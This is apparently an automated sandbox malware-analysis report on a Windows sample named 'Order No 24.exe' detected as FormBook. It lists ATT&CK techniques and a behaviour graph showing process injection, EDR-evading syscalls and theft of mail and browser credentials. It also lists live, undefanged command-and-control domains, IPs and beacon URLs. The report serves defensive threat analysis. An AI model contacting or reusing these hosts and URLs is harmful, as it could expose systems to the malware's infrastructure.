                Source: Yara matchFile source: 00000002.00000002.2301597898.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4577455340.00000000035C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009D8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_009D8C4F
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009D923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_009D923B

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		3
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557782 Sample: Order No 24.exe Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 28 www.066bet.xyz 2->28 30 www.yushaliu.online 2->30 32 20 other IPs or domains 2->32 42 Antivirus detection for URL or domain 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 5 other signatures 2->50 10 Order No 24.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 vqiDHNHvZuv.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 net.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 vqiDHNHvZuv.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.pluribiz.life 209.74.64.58, 49994, 49995, 49996 MULTIBAND-NEWHOPEUS United States 22->34 36 ppp84k45ss7ehy8ypic5x.limelightcdn.com 23.106.59.18, 50024, 50025, 50026 LEASEWEB-UK-LON-11GB United Kingdom 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Order No 24.exe34%ReversingLabsWin32.Trojan.AutoitInject
                Order No 24.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.vehiculargustav.click/95c0/0%Avira URL Cloudsafe
                https://whois.gandi.net/en/results?search=4nk.education0%Avira URL Cloudsafe
                http://www.yushaliu.online/__media__/design/underconstructionnotice.php?d=yushaliu.online0%Avira URL Cloudsafe
                http://www.bio-thymus.com/ezyn/?bdlD=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKKN8Ow4Y4PJmf6bny7d6dDdcL0boa7lHYjswT0s5aRSMl4VpoSs=&92=DPyPNvf84fs0yXSp0%Avira URL Cloudsafe
                http://www.wukong.college/9ezc/0%Avira URL Cloudsafe
                http://www.4nk.education/gnvu/100%Avira URL Cloudmalware
                http://www.kdtzhb.top/1iqa/?bdlD=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgSz03N/ngXbpk/5Fwdw8cafADp2cf4RIz4iuPQDTbp2HaXJhBs8=&92=DPyPNvf84fs0yXSp0%Avira URL Cloudsafe
                http://www.evoo.website/293d/0%Avira URL Cloudsafe
                http://www.yushaliu.online/__media__/js/trademark.php?d=yushaliu.online&type=ns0%Avira URL Cloudsafe
                http://www.Yushaliu.online0%Avira URL Cloudsafe
                http://www.marketprediction.app/ucmb/0%Avira URL Cloudsafe
                http://www.4nk.education/gnvu/?bdlD=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fgjm51oWrqUAojxVNutEIZXbBtNc9Tjm96MrmkoGaIcMHcUdDvgw=&92=DPyPNvf84fs0yXSp100%Avira URL Cloudmalware
                http://www.bio-thymus.com/ezyn/0%Avira URL Cloudsafe
                http://www.fiqsth.vip/0m8a/0%Avira URL Cloudsafe
                http://www.yushaliu.online/fjsq/0%Avira URL Cloudsafe
                http://www.migraine-massages.pro/ym43/?bdlD=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQscAddRW98P8tCbtJa8oLuk3yqY6cOAnXTMvRpBjAJYE68xAYSo=&92=DPyPNvf84fs0yXSp100%Avira URL Cloudmalware
                http://www.pluribiz.life/afcr/0%Avira URL Cloudsafe
                http://www.fiqsth.vip/0m8a/?bdlD=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo/uZsaZcUpkXzlVN358Aa3h3Erj2PbCTGAasKcTxx+6hBqdfcgI=&92=DPyPNvf84fs0yXSp0%Avira URL Cloudsafe
                http://www.marketprediction.app0%Avira URL Cloudsafe
                http://www.corpseflowerwatch.org/yjfe/?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSp100%Avira URL Cloudmalware
                http://www.astorg-group.info/vdvc/?bdlD=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRfKoDXMQfKdBjdSZSECOlFudRAOmJhTFjNLDsmq1e7cQhZ206lWU=&92=DPyPNvf84fs0yXSp0%Avira URL Cloudsafe
                http://www.kdtzhb.top/1iqa/0%Avira URL Cloudsafe
                http://www.wukong.college/9ezc/?92=DPyPNvf84fs0yXSp&bdlD=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+OZM84GvKl89TQvRVoJIWPcM5zWijXmHfAArwoQ1tIQ9QsTkOWIA=0%Avira URL Cloudsafe
                http://www.migraine-massages.pro/ym43/100%Avira URL Cloudmalware
                http://www.yushaliu.online/fjsq/?bdlD=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSYA+LY6DfFhY+Crt0zWizEXMfJfu41KYaKDIGSHYliJNf2GNGmHE=&92=DPyPNvf84fs0yXSp0%Avira URL Cloudsafe
                http://www.astorg-group.info/vdvc/0%Avira URL Cloudsafe
                https://whois.gandi.net/en/results?search=astorg-group.info0%Avira URL Cloudsafe
                http://www.marketprediction.app/ucmb/?92=DPyPNvf84fs0yXSp&bdlD=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLzkLvWq29n5ve7+0lsSpjEyv7qUGv0unsJnIf6ZDw73FDzrF564s=0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                webredir.vip.gandi.net
                		217.70.184.50
                		truefalse
                  		high
                  www.evoo.website
                  		128.65.195.180
                  		truefalse
                    		high
                    fiqsth.vip
                    		3.33.130.190
                    		truefalse
                      		unknown
                      www.wukong.college
                      		47.52.221.8
                      		truefalse
                        		high
                        marketprediction.app
                        		3.33.130.190
                        		truefalse
                          		unknown
                          www.yushaliu.online
                          		208.91.197.27
                          		truefalse
                            		unknown
                            bio-thymus.com
                            		3.33.130.190
                            		truefalse
                              		unknown
                              www.pluribiz.life
                              		209.74.64.58
                              		truefalse
                                		high
                                www.kdtzhb.top
                                		47.242.89.146
                                		truefalse
                                  		high
                                  corpseflowerwatch.org
                                  		3.33.130.190
                                  		truefalse
                                    		unknown
                                    www.migraine-massages.pro
                                    		199.59.243.227
                                    		truefalse
                                      		high
                                      ppp84k45ss7ehy8ypic5x.limelightcdn.com
                                      		23.106.59.18
                                      		truefalse
                                        		unknown
                                        www.bulls777.pro
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.astorg-group.info
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.bio-thymus.com
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.marketprediction.app
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.fiqsth.vip
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.vehiculargustav.click
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.corpseflowerwatch.org
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.vnxoso88.art
                                                      		unknown
                                                      		unknownfalse
                                                        		high
                                                        www.066bet.xyz
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          www.4nk.education
                                                          		unknown
                                                          		unknownfalse
                                                            		unknown

                                                            Contacted URLs

                                                            NameMaliciousAntivirus DetectionReputation
                                                            http://www.4nk.education/gnvu/false
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.evoo.website/293d/false
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.kdtzhb.top/1iqa/?bdlD=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgSz03N/ngXbpk/5Fwdw8cafADp2cf4RIz4iuPQDTbp2HaXJhBs8=&92=DPyPNvf84fs0yXSpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.vehiculargustav.click/95c0/false
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.wukong.college/9ezc/false
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.bio-thymus.com/ezyn/?bdlD=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKKN8Ow4Y4PJmf6bny7d6dDdcL0boa7lHYjswT0s5aRSMl4VpoSs=&92=DPyPNvf84fs0yXSpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.yushaliu.online/fjsq/false
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.pluribiz.life/afcr/false
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.bio-thymus.com/ezyn/false
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.marketprediction.app/ucmb/false
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.fiqsth.vip/0m8a/?bdlD=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo/uZsaZcUpkXzlVN358Aa3h3Erj2PbCTGAasKcTxx+6hBqdfcgI=&92=DPyPNvf84fs0yXSpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.migraine-massages.pro/ym43/?bdlD=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQscAddRW98P8tCbtJa8oLuk3yqY6cOAnXTMvRpBjAJYE68xAYSo=&92=DPyPNvf84fs0yXSpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.astorg-group.info/vdvc/?bdlD=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRfKoDXMQfKdBjdSZSECOlFudRAOmJhTFjNLDsmq1e7cQhZ206lWU=&92=DPyPNvf84fs0yXSpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.fiqsth.vip/0m8a/false
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.4nk.education/gnvu/?bdlD=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fgjm51oWrqUAojxVNutEIZXbBtNc9Tjm96MrmkoGaIcMHcUdDvgw=&92=DPyPNvf84fs0yXSpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.corpseflowerwatch.org/yjfe/?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSpfalse
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.kdtzhb.top/1iqa/false
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.migraine-massages.pro/ym43/false
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.astorg-group.info/vdvc/false
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.wukong.college/9ezc/?92=DPyPNvf84fs0yXSp&bdlD=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+OZM84GvKl89TQvRVoJIWPcM5zWijXmHfAArwoQ1tIQ9QsTkOWIA=false
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.yushaliu.online/fjsq/?bdlD=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSYA+LY6DfFhY+Crt0zWizEXMfJfu41KYaKDIGSHYliJNf2GNGmHE=&92=DPyPNvf84fs0yXSpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.marketprediction.app/ucmb/?92=DPyPNvf84fs0yXSp&bdlD=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLzkLvWq29n5ve7+0lsSpjEyv7qUGv0unsJnIf6ZDw73FDzrF564s=false
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://duckduckgo.com/chrome_newtabnet.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://dts.gnpge.comvqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/ac/?q=net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cdn.consentmanager.netnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://whois.gandi.net/en/results?search=4nk.educationnet.exe, 00000004.00000002.4578877580.0000000003A86000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.00000000032A6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.yushaliu.online/__media__/design/underconstructionnotice.php?d=yushaliu.onlinenet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.yushaliu.online/__media__/js/trademark.php?d=yushaliu.online&type=nsnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.Yushaliu.onlinenet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.google.comnet.exe, 00000004.00000002.4578877580.0000000003C18000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.0000000003438000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://i4.cdn-image.com/__media__/pics/29590/bg1.png)net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                http://i4.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnet.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://i4.cdn-image.com/__media__/pics/28903/search.png)net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://i4.cdn-image.com/__media__/pics/28905/arrrow.png)net.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://delivery.consentmanager.netnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.iconet.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.marketprediction.appvqiDHNHvZuv.exe, 00000007.00000002.4580363583.00000000051EF000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://www.gandi.net/en/domainnet.exe, 00000004.00000002.4578877580.00000000043F2000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4578877580.0000000003A86000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.00000000032A6000.00000004.00000001.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.0000000003C12000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.ecosia.org/newtab/net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://whois.gandi.net/en/results?search=astorg-group.infonet.exe, 00000004.00000002.4578877580.00000000043F2000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.0000000003C12000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://ac.ecosia.org/autocomplete?q=net.exe, 00000004.00000003.2499290005.00000000079CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://i4.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffnet.exe, 00000004.00000002.4578877580.0000000004D5E000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.4581743267.0000000005F80000.00000004.00000800.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4577729658.000000000457E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		high
